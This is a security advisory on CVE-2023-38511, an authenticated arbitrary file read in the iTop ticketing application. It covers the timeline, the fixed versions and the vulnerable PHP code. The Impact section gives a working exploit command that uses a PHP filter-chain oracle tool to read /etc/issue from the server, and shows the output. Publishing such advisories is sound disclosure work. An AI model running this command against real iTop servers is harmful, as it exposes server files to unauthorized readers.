File read in iTop

15/04/2024 - Download

Product

iTop

Severity

Medium

Fixed Version(s)

3.0.4, 3.1.1

Affected Version(s)

≤ 3.0.3

CVE Number

CVE-2023-38511

Authors

Jérôme Mampianinazakason

Description

Presentation

iTop is an application used for ticketing purposes and device management. It offers several levels of privileges, from simple users allowed to create tickets, to application administrators able to configure the application, manage users or devices.

Issue(s)

Synacktiv discovered a file read vulnerability in the iTop project due to missing validation of user-provided input. It is exploitable only from an authenticated user on the application's backend.

Timeline

Date Description
2023.07.10 Advisory sent to itop-security@combodo.com
2023.07.19 Vulnerabilities acknowledged done
2023.11.28 Release of version 3.1.1
2024.01.17 Release of version 3.0.4
2024.04.15 Public release

 

Technical details

Description

The vulnerability resides in a call to the file_get_contents() function on a user-supplied parameter without prior verification.

The AJAX operation dashboard_editor allows any authenticated user on the backoffice to supply a file argument. This file is then transferred to the static method RuntimeDashboard::GetDashboardToEdit() in order to load a dashboard from a file, as showed in the following extract of the pages/ajax.render.php file line 1048:

<?php
[...]
case 'dashboard_editor':
    $sId = utils::ReadParam('id', '', false, 'context_param');
[...]
    $sDashboardFile = utils::ReadParam('file', '', false, 'string');
    $sReloadURL = utils::ReadParam('reload_url', '', false, utils::ENUM_SANITIZATION_FILTER_URL);
    $oDashboard = RuntimeDashboard::GetDashboardToEdit($sDashboardFile, $sId);
    if (!is_null($oDashboard)) {
        if (!empty($sReloadURL)) {
            $oDashboard->SetReloadURL($sReloadURL);
        }
        $oDashboard->RenderEditor($oPage, $aExtraParams);
    }
    break;

[...]

?>

No sufficient check is performed in this method before reading the file's content.

[...]
    public static function GetDashboardToEdit($sDashboardFile, $sDashBoardId)
    {
        $bCustomized = false;
        // Search for an eventual user defined dashboard
        $oUDSearch = new DBObjectSearch('UserDashboard');
        $oUDSearch->AddCondition('user_id', UserRights::GetUserId(), '=');
        $oUDSearch->AddCondition('menu_code', $sDashBoardId, '=');
        $oUDSet = new DBObjectSet($oUDSearch);
        // if id is in the database, read from it
        if ($oUDSet->Count() > 0) {
            // Assuming there is at most one couple {user, menu}!
            $oUserDashboard = $oUDSet->Fetch();
            $sDashboardDefinition = $oUserDashboard->Get('contents');
            $bCustomized = true;
        } else {
            // Else read from file
            $sDashboardDefinition = @file_get_contents($sDashboardFile);
        }


        // init dashbard from the content
[...]

If the provided sDashBoardId does not exist, the user-supplied file is then used in the file_get_contents() call.

 

Impact

Using this vulnerability and the php_filter_chains_oracle_exploit tool, it is possible to read arbitrary files on the remote server.

$ python3 filters_chain_oracle_exploit.py --target http://localhost/pages/ajax.render.php --headers '{"Cookie":"itop-bf***6g"}' --data '{"operation":"dashboard_editor", "id":"999999999"}' --parameter file --file /etc/issue
[*] Additionnal data used : {"operation":"dashboard_editor", "id":"999999999"}
[*] Additionnal headers used : {"Cookie":"itop-bf***6g"}
[+] File /etc/issue leak is finished!
b'RGViaWFuIEdOVS9MaW51eCAxMSBcbiBcbAoK'
Debian GNU/Linux 11 \n \l